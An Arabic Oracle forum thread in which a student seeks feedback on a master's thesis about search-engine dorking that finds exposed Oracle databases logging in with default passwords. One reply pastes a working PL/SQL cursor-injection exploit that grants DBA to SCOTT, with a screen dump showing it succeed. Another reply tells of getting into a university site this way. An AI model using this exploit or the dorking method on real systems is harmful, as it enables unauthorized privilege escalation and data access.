إنتقال للمحتوى

  • تسجيل الدخول عبر الفيس بوك تسجيل الدخول عبر تويتر Log In with LinkedIn Log In with Google      تسجيل دخول    
  • إنشاء حساب

صورة
- - - - -

رسالة ماجستير بعنوان Securing Oracle Database From Search Engines Attack


10 رد (ردود) على هذا الموضوع

#1 samia

samia

    مشترك

  • الأعضــاء
  • 82 مشاركة

تاريخ المشاركة 05 May 2010 - 11:59 AM

السلام عليكم ورحمة الله وبركاته

ارجو من الاخوه الزملاء ابداء ارائهم بخصوص رساله بحث بالماجستير والتى هى بعنوان

Seuring oracle database from search engines attack


الموضوع باختصار بيتكلم عن مخاطر محركات البحث فى الوصول الى قواعد البيانات اوراكل وبالتالى مهاجمتها وهّذا يتم من خلال الدخول الى محركات البحث واجراء البحث عن كلمات دلالية للدخول الى الداتابيز انجن (isqlplus) فيقوم الهاكر بكتابة urltitle:/isqlplus او كتابة tnsnames او كلمات اخرى للدخول الى قواعد البانات وباستخدام default username/password يمكن الدخول على النظام وهذا لايتم فى جميع الانظمه ولكن يتم فقط فى الانظمه التى لم يتم عمل حماية على قوعد البيانات الخاصه بها وللاسف هذه النسبة لست بقليل حيث اجتازت حوالى 40% وهذه نسبة ليست بهينه الموضوع بصراحه عجبنى من خلال تصفحى بالانترنت والبحث عن مواضيع تخص الاوراكل سيكورتى فوجدت هذه المقاله والتى هى بعنوان" Search engine used to attack database" ودا الرابط الخاص بالملف ال بيشرحه

http://www.itsec.gov.cn/docs/2009050...25368.pdf

ويوجد اخرى للاختراق من خلال محركات البحث مثل
Default Passwords .
Easily-guessed Passwords .
Misconfigurations
Excessive Privileges
No Listener Password .
Denial of Services (DoS) & Buffer Overflows.
SQL injection
ونزلت مقالات كثيره بخصوص هذا الموضوع ارجو من الاخوه الزملاء ابداء ارائهم واقتراحاتهم بخصوص هذا الموضوع وهل لى ان ادعم هذه الرسالة بمشروع عملى ام لاارجو ان لا تبخلو على بأرائكم فهى تهمنى اشكركم

#2 samia

samia

    مشترك

  • الأعضــاء
  • 82 مشاركة

تاريخ المشاركة 05 May 2010 - 07:40 PM

اين الرد يا شباب
يا عملاقة الاوراكل

#3 Guest_عادل الشهري_*

Guest_عادل الشهري_*
  • الزائرين

تاريخ المشاركة 05 May 2010 - 10:13 PM

السلام عليكم

قد يكون من أسباب تأخر الرد عدم كتابة عنوان واضح للمشاركة

تم تعديل العنوان ونتمنى لك التوفيق ....

#4 samia

samia

    مشترك

  • الأعضــاء
  • 82 مشاركة

تاريخ المشاركة 06 May 2010 - 12:26 AM

اشكرك اخى عادل الشهرى عن هذا التوضيح

#5 zezo_isl

zezo_isl

    عضو

  • الأعضــاء
  • 15 مشاركة

تاريخ المشاركة 06 May 2010 - 02:37 AM

This is slightly modified version of: http://milw0rm.com/exploits/7677
This is based on cursor injection and does not need create function privileges:

DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
end;

#-----------screen dump---------------------------------------------------#
SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO

SQL> DECLARE
2 D NUMBER;
3 BEGIN
4 D := DBMS_SQL.OPEN_CURSOR;
5 DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute imme
diate ''grant dba to scott'';commit;end;',0);
6 SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
7 SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
8 end;
9
10
11 /
DECLARE
*
ERROR at line 1:
ORA-01403: no data found
ORA-06512: at "SYS.LT", line 6118
ORA-06512: at "SYS.LT", line 6087
ORA-06512: at line 7


SQL> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT CONNECT NO YES NO
SCOTT DBA NO YES NO
SCOTT EXECUTE_CATALOG_ROLE NO YES NO
SCOTT RESOURCE NO YES NO


Sid
www.notsosecure.com

# milw0rm.com [2009-07-02]

مدونتى


سبحان الله وبحمده
سبحان الله العظيم

#6 samia

samia

    مشترك

  • الأعضــاء
  • 82 مشاركة

تاريخ المشاركة 06 May 2010 - 04:49 PM

أخى zezo_isl ممكن توضح ماذا نعنى بمجموعة هذه الاسطر

#7 samia

samia

    مشترك

  • الأعضــاء
  • 82 مشاركة

تاريخ المشاركة 06 May 2010 - 11:16 PM

اين مشاركة الاعضاء

#8 zezo_isl

zezo_isl

    عضو

  • الأعضــاء
  • 15 مشاركة

تاريخ المشاركة 06 May 2010 - 11:55 PM

سلام عليكم
انا لست خبير فى نظام الحماية ولكن وجد معلومة عن SQL injection هذه السطور مثال عليها فى المشاركة السابقة
- وكان من فترة وجد سطر sql على النت تضعة فى شريط البحث بجوجل يظهر لى تصميم القاعدة البيانات بعض المواقع عشوائى وسجلات الجداول وكلامات السر وكان ايامها دخلت على موقع كلية حاسبات جامعة عين شمس ولكن لاسف فقدت السطر ولكن الذى اتذكرة كان يعتمد على default username/password

مدونتى


سبحان الله وبحمده
سبحان الله العظيم

#9 samia

samia

    مشترك

  • الأعضــاء
  • 82 مشاركة

تاريخ المشاركة 07 May 2010 - 09:30 AM

شكرا لك اخى zezo_isl على ردك وتفاعلك وبالفعل هذا ما اقوم بعمل الماستر فيه هو خطوره محركات البحث فى الدخول على قواعد البيانات فانا اتذكر ايضا زميل دخل على منظمه قويه باستخدام الديفلولت اكونت

ارجو تفاعل الناس بخصوص هذا الموضوع

#10 samia

samia

    مشترك

  • الأعضــاء
  • 82 مشاركة

تاريخ المشاركة 07 May 2010 - 09:34 PM

اين الردود والتفاعلات

#11 samia

samia

    مشترك

  • الأعضــاء
  • 82 مشاركة

تاريخ المشاركة 15 May 2010 - 11:40 PM

نرجو مشاركة الاعضاء